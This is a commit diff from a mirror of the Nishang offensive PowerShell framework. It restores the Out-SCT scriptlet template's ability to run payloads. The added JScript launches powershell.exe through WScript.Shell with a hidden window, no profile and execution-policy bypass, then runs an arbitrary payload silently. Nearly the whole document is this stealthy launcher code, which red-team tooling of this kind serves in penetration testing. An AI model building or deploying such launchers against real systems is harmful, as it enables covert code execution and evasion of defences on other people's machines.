mirror of
https://github.com/samratashok/nishang
synced 2026-06-08 17:20:25 +00:00
Restored Out-SCT's PS payload capability
This commit is contained in:
+3
-1
@@ -80,7 +80,9 @@ https://github.com/samratashok/nishang
|
||||
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
r = new ActiveXObject("WScript.Shell").Exec($Payload);
|
||||
ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
|
||||
c = "$Payload";
|
||||
r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
|
||||
]]>
|
||||
</script>
|
||||
</registration>
|
||||
|
||||
Reference in New Issue
Block a user